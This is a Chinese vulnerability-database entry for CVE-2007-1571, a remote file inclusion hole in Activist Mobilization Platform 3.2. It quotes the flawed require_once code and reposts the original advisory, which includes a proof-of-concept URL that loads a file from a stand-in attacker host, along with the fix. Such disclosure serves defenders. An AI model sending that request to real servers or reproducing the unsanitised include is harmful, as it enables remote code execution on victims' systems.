发布日期：2007-02-21
更新日期：2007-02-21

受影响系统：

radicaldesigns Activist Mobilization Platform (AMP)

描述：

---

CVE(CAN) ID: CVE-2007-1571

Activist Mobilization Platform (AMP) 在实现上存在远程文件包含漏洞，可发送特制的URL请求到base.php脚本，使用base_path 参数指定远程系统上的恶意文件，导致在有漏洞的服务器上执行任意代码。

问题代码：

-----------------------includes/base.php------------
....
<?php
require_once($base_path."includes/base_db.php");
require_once($base_path."includes/base_template.php");
?>

----------------------------------------------------------


<*来源：Dedi Dwianto
  
  链接：http://xforce.iss.net/xforce/xfdb/33009
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Back to list | Post reply
[ECHO_ADV_71$2007] AMP v3.2 (base_path) Remote File Inclusion Vulnerability Mar 14 2007 01:58AM
erdc echo or id
ECHO_ADV_71$2007

------------------------------------------------------------------------
---
[ECHO_ADV_71$2007] AMP v3.2 (base_path) Remote File Inclusion Vulnerability
------------------------------------------------------------------------
---

Author     : Dedi Dwianto a.k.a the_day
Date Found    : March, 13th 2007
Location    : Indonesia, Jakarta
web     : http://advisories.echo.or.id/adv/adv71-theday-2007.txt
Critical Lvl    : Highly critical
Impact     : System access
Where     : From Remote
------------------------------------------------------------------------
---

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application    : Activist Mobilization Platform (AMP )
version     : v3.2
URL     : http://www.radicaldesigns.org

AMP is completely dynamic suite of content management tools designed with the small
non profit organization,grants roots coalition,political campaign or mass mobilization in mind.
------------------------------------------------------------------------
---

Vulnerability:
~~~~~~~~~~~~~

- Invalid require_once function at includes/base.php
-----------------------includes/base.php------------
....
<?php
require_once($base_path."includes/base_db.php");
require_once($base_path."includes/base_template.php");
?>

----------------------------------------------------------

Input passed to the "$base_path." parameter in base.php is not
properly verified before being used. This can be exploited to execute
arbitrary PHP code by including files from local or external
resources.

Proof Of Concept:
~~~~~~~~~~~~~~

http://localhost/amp-3.2/includes/base.php?base_path=http://atacker[.]com/
inject.txt?

Solution:
~~~~~~

- Sanitize variable $base_path affected files.
- Turn off register_globals
- Upgrade to Lastest Version

------------------------------------------------------------------------
---

Shoutz:
~~
~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous
~ Jessy Nice Girl
~ az001,bomm_3x,matdhule,angelia
~ newbie_hacker (at) yahoogroups (dot) com [email concealed]
~ #aikmel - #e-c-h-o @irc.dal.net
------------------------------------------------------------------------

---
Contact:
~~~
EcHo Research & Development Center
http://advisories.echo.or.id
erdc[at]echo[dot]or[dot]id
the_day[at]echo[dot]or[dot]id

-------------------------------- [ EOF ]----------------------------------

[ reply ]


    
Privacy Statement
Copyright 2010, SecurityFocus

建议：

---

厂商补丁：

radicaldesigns
--------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.radicaldesigns.org/index.php

浏览次数：1875
严重程度：0（网友投票）